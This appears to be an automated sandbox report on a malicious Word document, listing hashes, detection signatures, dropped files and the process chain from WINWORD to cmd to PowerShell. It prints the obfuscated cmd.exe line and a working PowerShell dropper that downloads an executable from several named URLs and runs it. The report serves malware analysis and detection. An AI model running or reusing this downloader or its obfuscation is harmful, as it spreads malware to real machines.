Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-05-2024 18:19

General

  • Target

    5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc

  • Size

    126KB

  • MD5

    5ac1e88265ded3e67477cce519906e50

  • SHA1

    725f2a559f053ca645caa64f83e267f101474576

  • SHA256

    8e8423332fc3be61a54a2d4f2faaa5d0fac4de05af71a5fabbac0adac89d3456

  • SHA512

    72010c07a9ef5ea23e2d3e088c3c420c233ff5aa3d7c9b4bb6c7f453d8edda6c7a6787e461e57c441c2ad27170d12ca6343228d6c47597c24991bfbe56c6c99d

  • SSDEEP

    1536:8ptJlmrJpmxlRw99NBu+aFKUI4BxanVldfalV0UQwGZJCVwbGOrXWy:cte2dw99f1IkbLiNXy

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs (exe.dropper)
    http://www.knamanpower.com/U
    http://www.flanaganlaw.com/wkM
    http://lakecomoholidayapartments.com/uxbCg173
    http://farkop27.ru/uEEhY0
    http://juegosaleo.com/iu8xL5T1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5ac1e88265ded3e67477cce519906e50_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /V/C"^s^e^t ^w^7=^8^7^_^ ^q*^j^ ^'4^7^ C^ ^z^ ^b^Z^S^ ^m^?^e^ n^{( Jv^|^ ^p^S^E^ ^<^+{^ (^'^W^ ^z^0^ ^ ^:^M^3^ ^J^L^U^ ^J^d^[^ ^T^.^Z^ ^,Z^m^ ^xN^\^}^{^o^6^}^Z^`V^{^t^1^u^h^A^8^7cP^;^9^t%R^F^aC^7^mcs^=^4^}/^d^*^;^.^wU^k^a^'^{^a^@'^`^eP^8^Kr^;X^D^b/^$^Z^;^i^kc^DC^B^]V^6^T^-z^8^j^h^$N^d)^ ^Y^:^Om^.^f^:^e^:^JC^t*^]^d^I^Q^d^p^-^x^B/^ep^&^F^k^*^8^\^o^:^w^Zv^mv^-n^s(^*^Imr^;^;1^T^')^mN^ ^D^L^MCV^`^]^#^z_^B^f^$]^x^z^ (^2^~^,^'^g^u^t^eC^:^Zz^AkN^T^k^W^$a^_^;(^$^p=^e^|/^&^l^|m^G^i^[^|^z^F^9^S^_^d^G^;^,^a^m^J^'^o^|e^5^l^]^5^_n^t^X^`^w^yR%^o^=^DR^D^;^D^j^.^E^h^9^I^]^<^'d^b^[^zw^W^i^~^$H^q^b^{^<^T^]^y^>^U^Er^:^q^e^tV)^s^{^E^|^i)^0^mA^z^k^;^&^zy^&^8^M^_^ER^$^Z^HR^ ^Z^dRn(w^I^i(^>^e^ ^;^1)^t^3^B^o^Z^bc(N^x^G^k^$^&^Q%(^M^b/^h/^;(c^x^[^1a^U^-[^e^7^a^Yr^B^uz^o^[^Y^9f^:^@^[^;^L^Z^|^'n^.^$^e^6;Kx^AR^u^e^t^A^G^.^-^@^1^'^5^Y^a^+c^m^[Z^Zr^Y^tV^#^:^b^m^2^w^$^7^I(^+C^W^;^'^f^ ^g^\^;^13^'(^H^h^+^\^:^Ac^@^{^o^iB^`5^l^fq^:^bV^0^T^uc^y^Up^H_^x^:^Z^p^$v^b^2^&n^p^I^?e^L^`^t^$^-^w^]^=^jD^Q^D^{^f^GV%^9^E^z^@^J)^$^AN^T^;%^x`^'/^&^~0^7n^?^1W^Q^]1^Y^g^G^'^t^=^J^ ^E^$^-^=^d^X^U^ ^U^<^m^Z^K^Gxt^Y^T^`b^y^L^_^$^3^O^G^;^y^IC)^p^6^F^'^,T^A^@x^EN^'^p^[^G(^xg^s^t^`^o^>^i^u(^M^lu^wy^p^o^G^;^S^;^sG^.^,5^E^'vu^l^1^-v^3^T^eC^+5^Q^yn^L^2^mAx^w^~^<^8^XN^}^u^[^<r^i^W^_v/^B^]^h^m^-(^'^o^Z^d%c^En^5^.^4CR^o^y^H^l^e^U^e^a^l^b~^x^a^>^a^Q^sv^P^<^o^JV^<^g^k^&^eer^8^k^u^W^g^h^j^bT^@/^<^{^:/^K^S(^:^.v^'^pN^F^p^tl^E^yt^ ^J^s^h^Ic^'^@^lI^-^0(^Q^3^Y@lm^h^$^4^L^E^9^p^7^Ey%^S^u^*Em/^y^T^i^u(^+/r^d^g^h^.^\^_^'^7^3^G^4^2^7^J^m^p^$^p^d^o^X^Y^z^k^M^.^lr^'^B^a^a^_R^X^f^?^|^m/)^D^;/^]^m^0^:^S^i^q^p^q)^0^t^0^u^|^t^O^4^H^h^.Br^@^2^u^F^3^6^9^=^7^{^ ^J^1^Z^:^I^g^|^@^IC^O^S^6^b^k^G-^x^l^W^u^u^W^1^ 
/^0^Q^9^m^G^#^J^o^i^&/c^H^*^f^.^d^}^Hs^>F^G^t^_^enn^X(^e^e^}^J^?^m(^O^u^t^A/nr^~h^j^a^w^,^*p{V^B^a^2^A^E^y^B^z^X^a^FC^4^d^>^K^=^iS^+^#^lcC^?^o%^l^G^h^:^Z%^o^p^`v^m^@^-^e^o^o^,acL^}^s^e^q0v^k^-^>^<^a^Q)^T^l)^:N/^3^a^O/V/g^:^g^i^\^p^U^I^O^t^\^:V^t^@z^'^h^Dn^7^@^H^Y(^M^y^I^Y^k^{v^U^w^p^b^i/^K^l^km^_s^L^o^U^d^@c^i^M^s.^-^K^J^w^o^F^W^a^W^:^8^l^g^O^0n^w^l^s^a^8^k^ ^g^ZC^u^a^}/^bnc^s^A^a(^W^A^l^J^g^z^f^&^>^;^.^~^,^G^w^h^8^L^w7^p^I^w^e^Y^b/,^Y^m/^y^Q^7^:)^&^>^p^U(^a^t^L^|^$^t^]^t^l^h^P^:^;^@^u^B^'^U^z^W^o/^2^L^w^m^,^q^\o^+P*c^&N^I^.^Y^#rr^0^|)^e^\^4^l^w$^~^e^or^_^|^p^d^,^ln=^E^Ka%E^Bm^z^q^*^a^<^;^>nJv^,^k^\R^d^.^a^d^q^w^Tc^W^w^=^a^?^w^`^0^./^|^t^j/^l^t^-^:^?~^W^p^8^\V^t^*^;{^tn^t^,^hrj^J^'^]^D^U^=^Q^8^.^z^:O^Q^z^s^B^S^M^ev`^$^hSC^;^65+^t^yn^dn^7T^6^e^si^G^i^U^Q)^l^T^,^7C^9^J^7^b^~N^t^eZ^\^}^WR^Dv.^0^G(^t^uv^8^e^`^D^&N^*^]6^ ^Hl^'^t^X^e^8c^iC^g^e^@^B^K^j^ ^}R^bc^-^d^o\^$^&^-^'^>^2^w^h^g^I^eV^-^tn^A^>^e^=r^H^U^I^sn^7^d^[^l^~w^A^MF^$^$8^: ^B^9^}^l^`^q^1^l^;^&)^e^4^}^E^h^,^*^ ^sN^sVr^Z^]^~^e^WT^k^w^6R^0^o^Z^Fz^p&&^f^or /^L %C ^in (^1^4^9^1^,^-^4^,^3)^d^o ^s^e^t ^D^b^4=!^D^b^4!!^w^7:~%C,1!&&^i^f %C ^l^e^q ^3 c^a^l^l %^D^b^4:^*^D^b^4^!^=%"##
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $wdI=new-object Net.WebClient;$Mzz='http://www.knamanpower.com/U@http://www.flanaganlaw.com/wkM@http://lakecomoholidayapartments.com/uxbCg173@http://farkop27.ru/uEEhY0@http://juegosaleo.com/iu8xL5T1'.Split('@');$btZ = '110';$zVD=$env:public+'\'+$btZ+'.exe';foreach($NZt in $Mzz){try{$wdI.DownloadFile($NZt, $zVD);Invoke-Item $zVD;break;}catch{}} ##
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2980

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD9071.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igtgsnhr.5ag.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\110.exe

    Filesize

    36KB

    MD5

    41d9f8321bbd35aaf891f3b7bac060df

    SHA1

    58da7c06501159f4c7b909d59abc23152e8372ad

    SHA256

    29457444b7268825b17399a00ce19fcd9ecd6647b936f229c8ca2bb35ea4ca64

    SHA512

    5a23e2e3bd6713d0a66eb8ca74ac5ae878c549e20eb1d18423d7afa739d431685ebe0f66a8bf730c7b8188baaaedebe321294269de3e35e6b91bd07189803960

  • memory/2492-9-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-0-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-30-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-6-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-8-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-1-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-10-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-13-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-14-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-16-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-15-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-12-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-11-0x00007FF9D4390000-0x00007FF9D43A0000-memory.dmp

    Filesize

    64KB

  • memory/2492-7-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-569-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-4-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-31-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-32-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-17-0x00007FF9D4390000-0x00007FF9D43A0000-memory.dmp

    Filesize

    64KB

  • memory/2492-5-0x00007FFA16BAD000-0x00007FFA16BAE000-memory.dmp

    Filesize

    4KB

  • memory/2492-3-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-2-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-543-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-544-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-545-0x00007FFA16B10000-0x00007FFA16D05000-memory.dmp

    Filesize

    2.0MB

  • memory/2492-566-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-567-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-565-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2492-568-0x00007FF9D6B90000-0x00007FF9D6BA0000-memory.dmp

    Filesize

    64KB

  • memory/2980-38-0x000001F02A0A0000-0x000001F02A0C2000-memory.dmp

    Filesize

    136KB